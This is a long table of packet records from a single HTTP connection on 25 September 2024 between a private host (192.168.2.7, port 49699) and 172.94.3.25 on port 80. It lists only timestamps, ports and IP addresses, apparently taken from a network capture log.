Sep 25, 2024 18:33:53.979180098 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.979193926 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.979214907 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.979248047 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.979258060 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.979281902 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.979314089 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.979326010 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.979348898 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.979402065 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.979403019 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.979437113 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.979469061 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.979491949 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.979502916 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.979533911 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.979548931 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.979568005 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.979599953 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.979635954 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.979928017 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.979960918 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.979981899 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.979993105 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.980031013 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.980041981 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.980066061 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.980098009 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.980109930 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.980120897 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.980138063 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.980153084 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.980158091 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.980169058 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.980185032 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.980201006 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.980201006 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.980217934 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.980223894 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.980236053 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.980252028 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.980262041 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.980267048 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.980282068 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.980295897 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.980298996 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.980319977 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.980871916 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.980887890 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.980901957 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.980916977 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.980923891 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.980931997 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.980945110 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.980947971 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.980962992 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.980968952 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.980978012 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.980995893 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.980999947 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.981014013 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.981029987 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.981040955 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.981045961 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.981060028 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.981070042 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.981074095 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.981091976 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.981096983 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.981106997 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.981122971 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.981133938 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.981159925 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.981811047 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.981827021 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.981841087 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.981856108 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.981863976 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.981870890 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.981885910 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.981899977 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.981906891 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.981914043 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.981930017 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.981933117 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.981945038 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.981946945 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.981960058 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.981975079 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.981985092 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.981988907 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.982006073 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.982012033 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.982021093 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.982055902 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.982423067 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.982475996 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.005184889 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.005244017 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.005280018 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.005300999 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.005316973 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.005366087 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.005372047 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.005404949 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.005439043 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.005445957 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.047543049 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.218077898 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.224620104 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.224781990 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.224797010 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.224813938 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.224863052 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.224908113 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.256493092 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.263004065 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.263020992 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.263037920 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.263075113 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.263143063 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.263156891 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.263175011 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.263190985 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.263194084 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.263216972 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.263458967 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.263473988 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.263489962 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.263492107 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.263505936 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.263521910 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.263537884 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.263537884 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.263559103 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.263560057 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.263575077 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.263592005 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.263592958 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.263879061 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.264053106 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.264067888 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.264082909 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.264097929 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.264098883 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.264113903 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.264131069 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.264132023 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.264147043 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.264162064 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.264164925 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.264199018 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.264508009 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.264522076 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.264555931 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.264650106 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.264663935 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.264679909 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.264693975 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.264705896 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.264708996 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.264723063 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.264729023 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.264741898 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.264751911 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.265317917 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.265333891 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.265350103 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.265351057 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.265363932 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.265386105 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.265465021 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.265479088 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.265492916 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.265494108 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.265510082 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.265523911 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.265526056 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.265538931 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.265549898 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.265557051 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.265572071 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.265587091 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.265593052 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.265604019 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.265618086 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.265618086 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.265634060 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.265647888 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.265661001 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.265683889 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.266519070 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.266534090 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.266549110 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.266607046 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.266639948 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.266654968 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.266669989 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.266684055 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.266685009 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.266699076 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.266700983 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.266716003 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.266725063 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.266777992 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.266793966 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.266808033 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.266809940 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.266861916 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.266935110 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.266949892 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.266963005 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.266978025 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.266978025 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.267004967 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.267698050 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.267714024 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.267728090 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.267759085 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.267837048 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.267851114 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.267865896 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.267869949 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.267880917 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.267894030 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.267894983 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.267910957 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.267925978 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.267926931 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.267951965 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.267967939 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.267982006 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.267982006 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.267997980 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.268007994 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.268023968 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.268085003 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.268100023 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.268115044 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.268135071 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.268589020 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.268644094 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.268743992 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.268759012 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.268773079 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.268788099 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.268794060 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.268801928 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.268817902 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.268827915 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.268832922 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.268842936 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.268848896 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.268865108 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.268878937 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.268897057 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.268918991 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.269061089 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.269076109 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.269090891 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.269104958 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.269109964 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.269119024 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.269135952 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.269135952 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.269264936 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.269573927 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.269588947 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.269604921 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.269619942 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.269627094 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.269634962 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.269649982 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.269649982 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.269665003 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.269681931 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.269687891 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.269696951 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.269711971 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.269712925 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.269736052 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.269751072 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.269759893 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.269764900 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.269776106 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.269779921 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.269794941 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.269809008 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.269818068 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.269828081 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.269841909 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.269843102 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.269856930 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.269882917 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.269887924 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.269896030 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.269910097 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.269912958 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.269927979 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.269944906 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.269944906 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.269970894 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.269994974 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.270009995 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.270015955 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.270025015 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.270029068 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.270039082 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.270056009 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.270064116 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.270073891 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.270090103 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.270095110 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.270104885 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.270119905 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.270133018 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.270134926 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.270149946 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.270153999 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.270164967 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.270179987 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.270180941 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.270194054 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.270209074 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.270224094 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.270226002 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.270239115 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.270245075 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.270255089 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.270275116 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.270293951 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.270317078 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.270323992 CEST	49699	80	192.168.2.7	172.94.3.25
